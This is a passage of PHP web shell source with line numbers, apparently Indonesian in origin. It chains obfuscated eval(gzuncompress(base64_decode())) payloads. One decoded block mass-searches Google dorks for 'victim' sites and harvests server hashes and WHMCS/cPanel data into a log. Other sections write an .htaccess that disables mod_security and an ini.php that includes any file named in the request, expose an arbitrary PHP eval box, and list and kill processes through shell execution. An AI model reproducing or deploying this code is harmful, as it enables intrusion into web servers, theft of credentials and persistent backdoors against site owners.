ZHtIcPm8d1pebpjB0XjeEUKiPKhFbOtT/GJ+iUAE2fvc1i9s8k0y5tNH2eYxpyHMBB3Sfq00a/eI4X8ayX8c2QnTiwCJ4ibre5kkXmV0FMAfc9piOhWa6Y3gxLcxAbNh/g7ivV1lbhn+H0C81cCoi8rlB6PwT4zeVTSvoB/vo3jmoI4A==')));
  1040. ?><?php
  1041. eval(gzuncompress(base64_decode('eJyVVWFv2zYQ/R4g/+FmCKAMuJGxDsi2WEaCNeuMpWlRpyiGrhAo8WQRpiiNpGK7Q//7jpTixEaKYoBBS7y7x3vv7ihZxtJadHGUvXu7vPvE7K7+kX0ej/89Pbm0aK1sdGYdNy4eX4QtlzlZY6ZkLV08HV8A7aIxjckMto1xUq/8Nu1KLTMPzVSzyoKLZZMhYm/rQ8mDTW4/3NwcBtZ8m+EWi875NPy5AeD0BGQZRxupfZpYVA2MZgVqh2Y+y00yLLrJ6d22XEOhuLUpy39h8+WuVlKvYWHhtnFwdc+l4rlCWGj4KLVoNhaWaO7RzBIfO58lPdAjcDKcNaJMvno29VpIEzMjgnqT6fn5uc8ysli3fA2Qwuht6zlY4ErB35qCXkmDhWvMbqEFbsGIs8rVg+1KiLtdi+Bw65JWcanhrK3avfEProVCAzbk+aLlxqLYu3wD4AD+AcFt3VPLe/yno7xIGY39zpI7acsdXOndyFcuqrnt1pBelk2LGh5IJwTCi4Iahk3Yhnn25cZIh/EQMBnE6Luor0HMEvIeAPxyRulQrGcQtSuSLecWNa8xzrLfFzfXWRaKf3oifdtSw3HhSxePEnRF0lKNN+LFKDRvtEJFXSvXRDIFVkqF2Yqat2iodNpZFsiQgOi8/SlAb5JWrrnptE/jCVjcx4Ty5t2akzUo8SBEoDCBIw285+QR0pu+np4MPPrxe31N0+fTpOmDxsClf7byCx4gj2EO0zF4gp4JnW6dkW1hqcErtPsxHoAuwhE/BPa4ldbZQ7SgVEkol8+QGDhEm2AfmJSTcHAgV6jG+q2BTpjJ76X+/YHNj2b2nMHyrzc3i9s/h4GEQ/vPbH5991vy7mq5/PgK9kObPzO4Lgw6V3KlU9afzyBvjECTspcMNlK4KmU/TacMClSKoAq6z1I2vLdciOF9Tj0yc+IIjHIrfVmKRjUEualIM7+Zzz8sr98v+6ycmP+/2D39IdrfO6XqbBXu5IjUfunbkEQ/FNy7NTQkRQVx78UtULl80bsUt61qBIX8Sv3aFzHqbBiXqPtEFD9f7GvlzPMpP5dxAPk2yxl/qJwRDCqDZXp8BSRVU2MScJK2y5UsMn9FMaDvEM1wyrJccb3e3+WzhPfC0GKO1Hl8og4VEiEeBS9afDPQv5D389Hg4H//AX0GOCU=')));
  1042. ?><?php
  1043. eval(gzuncompress(base64_decode('eJydVW1rGzkQ/h7IfxhEQGvO5/XRQu4a71JzyXHm0qTUKeVIw6JdybawVtpK8ltK//uNtGsnTunBHYa1d14ezczzaCxniXRO+OSseH87vbunble/og+93tfTk7dOOCeNLpxn1ie9i2jyhZe1KJSspU+GvQtAq7DW2MKKxlgv9TyY0Sq1LAI0VWZexBBH+13GwdemYgTt33y8vj5OrNm2EFtRrXwoI5wbAU5P5Cw520gdqhTVwgAZVUJ7YfNRadPuoU2J765hGirFnMto+RvNp7taSb2EiYMb42G8ZlKxUgmYaPgkNTcbB1Nh18KO0pCbj9IW6Ak47c4iWMi30Ey95NIm1PI4vP7w/Pw8dnnmRN2wJUAG5LYJPThgSsFnjc5LaUXljd1NNBdbsHyw8HXnG3N+t2sEeLH1aaOY1DBoFs3B+SfTXAkLLhb6c8OsE/wQ8gOAI/g9gt/6554P4ssK68LRaNFapsxLN9vBWO9I7KlmbrWE7O3MNELDvusUQVhVoWBon25o4Gi2sdKLpEvod8NoVdSSkNAUozuA8BhgOZgbOjhr5ji2kjmhWS2Sovhjcn1VFCE9eIWv0D2TShRzlGRlkBHtXUJS9KQN0r3hJASHyEcMFdtGGS4S8lmTfjB2MpIOdct4kMCL5IO46A/FVR7pi5TnJIfp3++uJzd/deqB44BfSX5193v6fjydfrqEg8LK71UGIx9lyZSc64y0FRAojeXCZuQVgY3kfpGR18MhgUoohVgVXr6MdO8N4zy+vyY5vWh7oSNv89OTkecvgPG8Gc4QKqMMwm8WSF0wlvnl7bvx5GbaFun5f8z+OL368H9zD5PsskMTSKiSziOhrkIJ47Uj6ZrZNIikJXxmkM9qkbTEMwf44zFwGQzVcyW8iUJ4PEqK4CGJmxpvTQ++RpU4bxvjks7aJwNeokCCszOFgnxcgYpVIqEYgNKm/T1OUKLZaLxxGSCS3AbZNpuV5EkQcXR1+lvjfFD2LiWDffZ+5cWwexqapQ+QZRB7uh8+9E5PQi0Sfsrgl4vDUtyTnY/YfgdaTmFhxSyjC++bN+nTKQMCNH/2NkrZ96zRljWaPyeNRtJi8lGFASOE/RsM66p5sQWeoJDjgJQ2q1LJqgi7KqWA/0g4wIwWpWJ6eVjrh5rb3Rw/yK5auUX8/3r6hWYuBSRYIk4JH+G24TeXa3yGU3LSLZtv/wDzET4B')));
  1044. ?><?php
  1045. eval(gzuncompress(base64_decode('eJydVWFv2zYQ/R4g/+FAuKC8eVaKBsi2WEKNJsWMJc5QpxiGNCAokbaISKRK0rHdov99R1q2k3YdsH2hxOPd07u7x5OaJ8o56ZMe++NmdntH3aY5pff9/ufjo9dOOqeMZs5z65P+eTR55lUjWa0a5ZOT/jmgVVprLLOyNdYrvQhmtCqtWICmtVmw6OLooIvYn21D0YMOpu+vrp4HNnzN5FqWSx9ohO9GgOMjNU96K6UDS1lWBsiolNpLm48Km3aLNgXuXcs1lDV3LqPFLzSfbZpa6QeYOJgaD+NHrmpe1BImGv5UWpiVg5m0j9KO0hCbj9It0AE47b5FkMiXkEzzIJRNqBWxeIOTs7OzmGXPyablDwAZkJs25OCA1zV80Hh4oawsvbGbiRZyDVYMK990Z2MhbjetBC/XPm1rrjQM26rdH/7GtailBReJ/tRy66TYu3wH4Bn8DsGv/dOTd/LjEnlhabTcWmbcKzffwFhvSMyp4W75ANnruWmlhl3WKYLwskTB0AFd0dCj+coqL5MuYNAVY6uibRMSmqJ3BxCWIdLB2JBBr11g2QrupOaNTBh7O7m6ZCyE42lUgHIoOS5C9xKSSl+mwVUMS6PnpL/XBv2uNopn8iDFGclh9tf11WT6e9d8eO7wM8kvb9+k0/H15cXwzc30LexFUnwrFBj5qCxeq4XOyJYFgcJYIW1GXhFYKeGrjJyenBAoZV0jVon3JyPdvuVCxP0pyen5Ph9v8+OjkRdfIeMH50Z7KE1tEH9VYfmDscjZxc31eDKdsS1PL/5r/PvZ5bv/H93V9BAfcunFZmGP56qWbIFzBfvmEcv9QzPRv7VywRruy4rhHUroi09RoyQZ/tD/QODzCzrYQg56wjSoeBdFaFAiZZXsbHcv74E76LZBI90rEvFWNTvHENtT8GMGL8ObWWm8LBm0xql1INuulkokgXo86ig/YklQsS4lwx1O/3w/onZty0d8N5GsoFBZOc9o5X37a3oIHBKg+ZPdKOXf1p5ua0/zp6WnsfQxOHK7o6Es9D5gBLd/g+Edm6/u5AEKB11ASttlUauShclBAX8PWJKMsqLm+mE/Y/eU46DEXtRLV8XfyOENzUJJSJAblgeXcGPwKdQjrgE+J92d//I3cxUbCw==')));
  1046. ?><?php
  1047. eval(gzuncompress(base64_decode('eJydVm1v4zYM/l6g/4FLA8gZcnF629CtTYwr+oIF68vQtBiGXmHIlhJrlWVPUprkDv3voyzntWhwtwAxJPLhQ4omaYlRIIzhNmjGf94O7x+Jmee/kKdW6+v+3ifDjRGFio2l2gatk0pkYytyHkuRCxt0WyeAUq51oWPNy0JbocZOjFKhROyoiSzGcQUxpF1bLHXeFBGkffNwdbVpmNNZzGc8nVgXhvNbEezviVHQnArlouRpVkCjl3JluY56iQ7rhyoS3JuSKkglNaZPkt9INJznUqhnGBi4KSycvlAhaSI5DBT8JRQrpgaGXL9w3QudbdQLPdGKOKx9NTCQV3eY/JkJHRDNquS1u0dHR9Upm4bnJX0G6EPjtnRnMEClhM8KledC89QWej5QjM9As05m81p3ytj9vORg+cyGpaRCQafMyqXyd6qY5BpMFeiHkmrD2RLyDsEG/YLBzuy65o7/O8G4MDWKe8mQWmFGczhV80Z1ppyayTP0P42KkitYnDpEEpqmWDCkTabEvaPRVAvLg9qgXSfDV5F/CQEJEV0TuEcHw0Fbd4JmOca0JdRwRXMexPHl4Ooijp05alGvOWWx07E4LdQIwZ9GQnLk5DYNK0XHKUhdLz9sW7Tg+6vnjCpi4Q6J4BKdwaYrOA7eK5oqd6/ApeHf4DbZ8nxEIhj+fX01uPmjdgCbgF9JdHF/Ft6cXl+cd85uby5hMIBlLMnbeKBnq6pPCs247pOfSL1MC1ng/uDysos/AlPBbNYnP7t1yqUsKWPY4n1y6PfoIq32XRLt7/UswwoXY9Un/mwYeG9UKAs17zTDmnDCJIrPb69PBzfD2Ado2ffaPwwv7v6/dZ3Plb1r51GBRZJmwZvqogaaZpL8gy3rhg7WE9d8LALyBTuFtJc6pyxRE+fUplmM3R6QA4eBRtD5sdU4WGFxYTWmruoVOTFZUFcqiiVXASrzoMY8Hj49dnEqQ/TReWg+DM6x4MvCiFk85racTgQLqvovporrugleMBnYQCYknS0edNR0p0MSx/VI3IY8wTc055rlOqeT0wlKnE9Uks8dOiFOmlA1lpRxk3lxwrxY0y9CQt9JNKlHi6RzszDP5xUun1OVU13L8krm5rTiS6TwjMJoymUtkpVIFzlVC5guvBvOJl6Aiwo1Ll68ABe1YLGvt8lin/iYMPA6IO9IjKAuiMYqC432Ztah0LAArZKyE1XlaBdikbJtzDrEJ/BdFkDMMqG7UVWCd0LqhO8KGbO+S43vYLd6tzbZma0dyQSv/7gNaO3vfYVFyTd6TLyAsXPJ+8RPleM5TsFiCifVx/aDySjeIY6hW86q/yH+NWcnQKLGZhd2SC9EtgiL8nX5RbDaz7GoRxfDXTMCeAHDNu+TOJFUPRPINB/1M2vL4zB8QxtG2O8u4A7BbwBdXVi8vzfDcqFdm5TVoHQ0a8Oh03jXkvqAtqdFmBU5d/FtsITlJJEijd2tI3xztOUFzUfuMhFaf9daDclX/K3vVysmOL7IygQf7hO3PLXzFzUq8/8ArSpuaQ==')));
  1048. ?><?php
  1049. eval(gzuncompress(base64_decode('eJydVGFv2zYQ/R4g/+FAGKCMeVaGDc22SEKNNcOMuclQpRuGrhAokbYIU6RG0rGNov99R0lW6hQdsH2hTd7d07t3j5TrSDonfDQpfrvPH95Rd2xe0PfT6YfLi5dOOCeNLpxn1kfTm+7IF142olCykT66mt4AngprjS2saI31Um/CMZ5KLYsATZXZFF2Ko7OhYoz1pZhBZ3dvV6vzwoYdCnEQ1c4HGuG7HcDlhVxHk73UgaWoagMkqYT2wmZJaeNh0abEvWuZhkox51Ja/kCz/NgoqbewdHBnPCwemVSsVAKWGv6Qmpu9g1zYR2GTONRmSdwDPQHHw7cIEvkYmmm2XNqIWt6JN7u6vr7uupw40bRsC5ACuW9DDw6YUvCXxuAraUXljT0uNRcHsHxe+2aILTh/OLYCvDj4uFVMapi3dTsGf2GaK2HBdUS/bpl1go8pXwA4gz8h+IP/NPJG/L1DXiiNFv1Jzrx06yMs9JF0PTXM7baQvlybVmg4dR0jCKsqNAyd0T0NM1rvrfQiGgpmgxi9i/ohRDTG7AEgLHOkg7Whg0m7QdlK5oRmjYiK4ufl6rYoQjlGOwdIh5ZjPEwvIrHwVfzIlMQKR6ajM+gXnVGemYOU1ySD/M/Xq+Xdr8Po4Tzhe5LdPvwU/75YLRf5bQ6jQcrPTQKJ71yFhDY6JT0HAqWxXNiUfEtgL7mv8d/VFYFKKIVYFd6dlAz7lnHe7b8jGb0Zu/E2u7xIPH+GnCVroz1URhmE39eoPLaDPb66f71Y3uU9Sc//W/Hb/PbN/ywdlRyKQwsTJZ3HqboK3Yc35vnQgmkMjrSqoz6VOZhw07D+pk8kfJXCNwHI7DWaN4XWOHkoNsK3+53k0Voq0YWeQcdkfsKZ3oxPxknKLGGnF8JyCrUV65TW3rc/xk+FcwI0+2SXxOxzVWivCj1ThXaqdMUdt3c0OJq+Dxgh7d9g2MDm2R15gkIZA1Lc7kolqyLcZAr4XKMkKS1KxfR2fPMC5fCp7t1CqdXO1d2r/vQPj7kUECE1VAeXYGL85fIR14CedWP6+A+r5Pdj')));
  1050. ?><?php
  1051. eval(base64_decode('c2V0X3RpbWVfbGltaXQoMCk7DQogICBpZihpc3NldCgkX1BPU1RbJ2F1dG8nXXswfSkpIHsNCiAgICAgICRmaWxlID0gZm9wZW4oImdhbnRlbmcudHh0IiwiYSIpOw0KICAgICAgZWNobyAnPGJyIC8+PGRpdiBpZD0icmVzdWx0Ij48Yj5QZW5jYXJpYW4gZGltdWxhaS4uLiBzZW1vZ2EgZ2FudGVuZyBzYWludCEgOyk8L2I+PGJyPjxicj4nOyAgICAgICAgIA0KICAgICAgbGV0SXRCeSgpOyAgICAgICAgIA0KICAgICAgZm9yKCRnb29nbGVQYWdlID0gMTsgJGdvb2dsZVBhZ2UgPD0gMTAwMDsgJGdvb2dsZVBhZ2UrKykgew0KICAgICAgICAgJGdvb2dsZVJlc3VsdCA9IGdvb2dsZSgkX1BPU1RbJ2F1dG8nXSwgJGdvb2dsZVBhZ2UpOw0KICAgICAgICAgaWYoISRnb29nbGVSZXN1bHQpIHsNCiAgICAgICAgICAgIGVjaG8gJ1BlbmNhcmlhbiBzZWxlc2FpLic7DQogICAgICAgICAgICBmY2xvc2UoJGZpbGUpOw0KICAgICAgICAgICAgYnJlYWs7DQogICAgICAgICB9DQogICAgICAgICANCiAgICAgICAgIGZvcigkdmljdGltID0gMDsgJHZpY3RpbSA8IHNpemVvZigkZ29vZ2xlUmVzdWx0KTsgJHZpY3RpbSsrKXsNCiAgICAgICAgICAgICRyZXN1bHQgPSBnMDBuKCRnb29nbGVSZXN1bHRbJHZpY3RpbV1bJ3VuZXNjYXBlZFVybCddKTsNCiAgICAgICAgICAgICRhbGV4YSA9IGdldEFsZXhhKCRnb29nbGVSZXN1bHRbJHZpY3RpbV1bJ3VuZXNjYXBlZFVybCddKTsNCiAgICAgICAgICAgIGlmKCRyZXN1bHQgIT0gIkZhaWwhIikgew0KICAgICAgICAgICAgICAgJGhhc2hlcyA9ICIiOw0KICAgICAgICAgICAgICAgZm9yZWFjaCAoJHJlc3VsdCBhcyAkcmVjb3JkKSB7DQogICAgICAgICAgICAgICAgICAkaGFzaGVzID0gJGhhc2hlcyAuIHN0cl9yZXBsYWNlKCc6Ojo6OicsJycsJHJlY29yZCkgLiAiXG4iOw0KICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgJHNlcCA9ICI8LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLT5cbiI7DQogICAgICAgICAgICAgICAkZGF0YSA9ICRzZXAgLiAkZ29vZ2xlUmVzdWx0WyR2aWN0aW1dWyd1bmVzY2FwZWRVcmwnXSAuICIgLSBBbGV4YTogIiAuJGFsZXhhLiAiXG4iIC4gJHNlcCAuICRoYXNoZXMgLiAiXG4iOw0KICAgICAgICAgICAgICAgZndyaXRlKCRmaWxlLCRkYXRhKTsNCiAgICAgICAgICAgICAgIGVjaG8gJzxzcGFuIGNsYXNzPSJZIj4nOw0KICAgICAgICAgICAgZWNobyAiPGZvbnQgY29sb3I9XCJncmVlblwiPkhvcmUuLiBEYXBhdCBwZXJhd2FuIDpEIDxicj4gS2xpayBvcGVuIG5ldyB0YWIgZGliYXdhaCBpbmkgdW50dWsgbWVuZGFwYXRrYW48YnI+ID09PiBTRVJWRVIgSEFTSCAtIFdITUNTIC0gQ1BBTkVMIERMTCA8PT08L2ZvbnQ+PGJyPi0tPVtbIDxhIGhyZWY9P2Rvcms9JGRvcmt7JGdvb2dsZVJlc3VsdFskdmljdGltXVsndW5lc2NhcGVkVXJsJ119IHRhcmdldD0nX2JsYW5rJz57JGdvb2dsZVJlc3VsdFskdmljdGltXVsndGl0bGVOb0Zvcm1hdHRpbmcnXX08L2E+IF1dPS0tIjsNCiAgICAgICAgICAgICAgIGVjaG8gIjxwcmU+IiAuICRkYXRhIC4gIjwvcHJlPjwvc3Bhbj48YnIgLz4iOw0KICAgICAgICAgICAgICAgDQogICAgICAgICAgICB9DQogICAgICAgICAgICBlbHNlIHsNCiAgICAgICAgICAgIGVjaG8gJzxzcGFuIGNsYXNzPSJYIj4nOw0KICAgICAgICAgICAgZWNobyAiPGEgaHJlZj1cInskZ29vZ2xlUmVzdWx0WyR2aWN0aW1dWyd1bmVzY2FwZWRVcmwnXX1cIiB0YXJnZXQ9J19ibGFuayc+eyRnb29nbGVSZXN1bHRbJHZpY3RpbV1bJ3RpdGxlTm9Gb3JtYXR0aW5nJ119PC9hPiAtIDxmb250IGNvbG9yPVwiYmxhY2tcIj4gVXBzLi4uIEphbmRhbnlhIGthYnVyIDpEIDwvZm9udD4iOw0KICAgICAgICAgICAgZWNobyAiPC9zcGFuPlxuPGJyIC8+IjsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIGxldEl0QnkoKTsNCiAgICAgICAgIH0NCiAgICAgIH0NCiAgICAgIGVjaG8gJzwvZGl2Pic7DQogICB9'));
  1052. ?><?php
  1053. eval(gzuncompress(base64_decode('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')));
  1054. ?><?php
  1055. eval(gzuncompress(base64_decode('eJytVv1vojAY/n3J/ofXxgTIiEr22ylLjOccyT4u6n3vYjqogQyB0G56uex/v7aAFkTmbmehteV9nz5v+/QFStiCBSuyCINVwPSe0YfTk2CpB5QSprcXk/H8p+bF6aP2yzDgz+lJ23EsS73BhmWckEhHPqZ+h20YMhFGEoi4fgza4CHtXgy84BkCz0YpoU8hQxd8VN6aMGyHQfTIkcgmCWOP6Og+vY+QWZ6/f3qyjFOCXV/P7DGF9po8cF7FXGhAExyBG2JK7e/ZHFHMa9QRlh006MpuMfmgK+wvkORAScIpIPsff5wwZ9j2MMMcRqJ1JD/eIP5Q9LJBlJku12nAiL63oqbE2C0gkkyVwL5J7l+vbkYzmI2nX8ZTGN5+hOFoNJ7Nroazq9rwHEsWcYkwZ+Pr8WgOk+nd50+L0d3taDjXe5tzXBQz8Mxd34DL6d0NsIeQkvSZpFTGmkNyRAHprXQRrqnOZGRTF31RcUs3foq4uhR3YwsnLrsn3Pi19oOQ6LsHMIAyWLb3baeXF0fUSni1gSXY87gMqYzPZL8Tkv3zY8oivMp7TzzSbe/AKsC1c+PMYUfQtLKFUfmU16bE1FCM8+YV8th1OXNx1N7BKydQwytvijRQDaTFyV3iIGyhIhmIB5YockcEeaSe04q/OLHqgHMQZn+sA5Sli5QkIXaJrn0QP83UNLOKuD1gdbh7GBxCpiFzz/otSBmEVodypHv3nf5wGACOQcDgp2RpowaQlwNZtsiwVaddulXy0AsQrlKx7ftYP2TWmgwnw2uAVqtV5DEoAZSUWUi5RplWdoumSHp12iwQVG1mQ04DVN3o6wrd4paUtY/erNKK/dvQSkqtIh0N0f0PGNAEUpKbkAEjG4b5zkEar6lt9fhLJKT2eS8XXgVASK/w2L7tm1+6dQev0bqWc6O6K8oui5rXZ2e7jK2ugFbzBZA5a31ptXTDmNbwVD8iuvwLTC7By19qR6FI')));
  1056. ?><?php
  1057. eval(gzuncompress(base64_decode('eJzVVmlP4kAY/m7ifxir2Za1yxnZRIGkCxWJAgYwbuKaZmhHOkuvdKYeMf73naMV5RKPLwukmc68z7zH8z4zEEQtin1kedjHVCvmjra3dnd3gdHqdnrgGzg3hkNwYgxPtrf2oOOX6kAZmmdmcwTag/7FudXs95rGSCveV2D21ePQQ9jRi/flYrlYgfypJwTFAfTR61nkQ+zpM3AOHA/6XUDHHvOFA6KwaPYiSMhGfrnhXRg7b2yIbzRMCKLantU2R1eqE8ZT9TqXA4/MGX+pQ8dxKY3mDI5kCcqgDmwX2VPrNvECTSB0UZtcFu1yE5EHtxEVlgVuDozm6fYWst0QKLVx3KiRCAbA9phtXR2X1AaojRuXJ93mUFJSK4zZVIFbNdJkZFA7rELHrJo7ikhk1fyeC4mLCAtQ4fCbMEbQdkFqDAngg8qcaTbKA0JjK0aRB22kqYf8o+qqqqegPFD+BIKzZ+gCgNnzPBlG2rxAPT0XwsG3WQ1IMiWIqA2F2c3iUGoFZtPIUB5Bj4vQCZxAT21wd20+BEOIAwoOWxn4KeXiuckX+dDfIkQo5LI/aIkNltEjO2JTHqQ1J4KP3s9EivpPqNAWqBj0WxdM5YKITq/NFRWHTolscgDg5dLnGyQ2TU8T9lImywUqHAkV0ySYcJswCdg5ITF84Q2htgfGLyCbI01k+JyJbA2OnGsPGdBcf6ypPsPdudhDDFqri0hzj1mZZlVaVh/6EM0dwBF8WJxkR/Utihfn7TC4wZMwojgMSnOQZOyE7DAP1hIAzjrdzoh1tl6acbGaCnme7u8frZOL2ELIhY0+IBeJ+iK5pCuvBPSVB5VpdY3O2Utx8AvU2+h2XCEOcQUT1rTmwASMxr/IpmBgts3f56B4f/CzelC1q5XqTdWpHogCCY/LWZPBCNpcTOupeiTgfeoxf/BEuWSWKCaN4COK8ZliWGhCMHybNwTjI0LgBH26cFnj+2njc+jqEsoK+usbX27BG5+P3t/4KeqTjb8CJUgTEHU9KorRxPIhtV0Lep6mFLT899wh4M+ComdpsAGcJkHuha6YOxxZFE6Ippg8l0MgriVud1W+Zj/u7jz9RwgwmVuvXIt4eJDKCrl+QqwbYQHnfYZmc6dJDNm90zZ6I7PX1tn1M4YgmiIwuuj+Ms7AA1/1GCCfn/P3D3U9bcE=')));
  1058. ?><?php
  1059. eval(gzuncompress(base64_decode('eJxdkF9rgzAUxd8Fv0MohSiUubf9U+nG1r21BfcyxggxXjUQE5dEShn77kvUtXQvgXtOcu75ZW3AEss7IIJ33EbX8UMY8DrixhnRkux3xdsHrrihpQD8GcffYbAGrZUmGnqlLZeNf4TCYEmPKqtVDzLCfdtfccnxCh+wT1yWgh6zBTK0BtKpClCGdptNGJwV0vBqUl0W0tBwY0GTRqiSCuOdrTeoEOpABi0Il0wMU9I/Zyxx0jvacEa+BmXBkKZnoxEGMxOpB8ksV9Kv2O62LwtXtz5obiHyRKux+sjQugThIFIG0lXL01In8yFV6ec8NT2ViAlqTIbLG5w/ve8fiyJNvJ6jS/sW589TiQptTi3mu2ni0pI592+Pw7mMuMP5K0jQ1AKa/xwVA2NgTD0IcUT38Wn3ue14JDOF5wXWKjTxuennF+hNqpo=')));
  1060. ?>
  1061.  
  1062. <?php
  1063. if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
  1064. <form action="?rd=<?php echo $pwd; ?>&amp;x=php" method="post">
  1065. <table class="cmdbox"><tr><td>
  1066. <textarea class="output" name="cmd" id="cmd"><? eval(gzinflate(base64_decode(''))); ?></textarea>
  1067. </td>
  1068. </tr>
  1069. <tr>
  1070. <td>
  1071. <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" />
  1072. </td></tr></table>
  1073. </form>
  1074.  
  1075. <?php }
  1076. // ********** x=htacs **********//
  1077. elseif(isset($_GET['x']) && ($_GET['x'] == 'htacs')) {
  1078. ### bypass generate htaccess ###
  1079. @error_reporting(0);
  1080. $htaccess=fopen('.htaccess','w');
  1081. $iniphp=fopen('ini.php','w');
  1082.  
  1083. $jablay="<IfModule mod_security.c>
  1084. SecFilterEngine OFF
  1085. SecFilterScanPOST OFF
  1086. </IfModule>";
  1087. $kimcil="<?
  1088. echo ini_get(\"safe_mode\");
  1089. echo ini_get(\"open_basedir\");
  1090. include(\$_GET[\"file\"]);
  1091. ini_restore(\"safe_mode\");
  1092. ini_restore(\"open_basedir\");
  1093. echo ini_get(\"safe_mode\");
  1094. echo ini_get(\"open_basedir\");
  1095. include(\$_GET[\"ss\"]);
  1096. ?>";
  1097. fwrite($htaccess,$jablay);
  1098. fwrite($iniphp,$kimcil);
  1099.  
  1100. $kobel="<center><br/><br/><nobr><b><span class='b7'> BYPASS</span> <span class='b8'>HTACCESS </span></b></nobr><br/><br/><span class='b9'>Generate htaccess & ini.php Successfully :)</span> <br/><br/><br/></center>";
  1101. echo $kobel;
  1102. }
  1103.  
  1104. // ********** x=process **********//
  1105. elseif(isset($_GET['x']) && ($_GET['x'] == 'process')) {
  1106. ### bypass using process ###
  1107. function process() {
  1108. if(!$win) {
  1109. $handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");
  1110. }
  1111. else {
  1112. $handler = "tasklist";
  1113. }
  1114. $ret = myshellexec($handler);
  1115. if (!$ret) {
  1116. echo "Can't execute \"".$handler."\"!";
  1117. }
  1118. else {
  1119. if (empty($processes_sort)) {
  1120. $processes_sort = $sort_default;
  1121. }
  1122. $parsesort = parsesort($processes_sort);
  1123. if(!is_numeric($parsesort[0])) {
  1124. $parsesort[0] = 0;
  1125. }
  1126. $k = $parsesort[0];
  1127. $ret = htmlspecialchars($ret);
  1128. if(!$win) {
  1129. if($pid) {
  1130. if (is_null($sig)) {$sig = 9;}
  1131. echo "Sending signal ".$sig." to #".$pid."... ";
  1132. if (posix_kill($pid,$sig)) {
  1133. echo "OK.";
  1134. }
  1135. else {
  1136. echo "ERROR.";
  1137. }
  1138. }
  1139. while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
  1140. $stack = explode("\n",$ret);
  1141. $head = explode(" ",$stack[0]);
  1142. unset($stack[0]);
  1143. $prcs = array();
  1144. foreach ($stack as $line)
  1145. {
  1146. if (!empty($line))
  1147. {
  1148. echo "<tr>";
  1149. $line = explode(" ",$line);
  1150. $line[10] = join(" ",array_slice($line,10));
  1151. $line = array_slice($line,0,11);
  1152. $prcs[] = $line;
  1153. echo "</tr>";
  1154. }
  1155. }
  1156. }
  1157. else
  1158. {
  1159. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
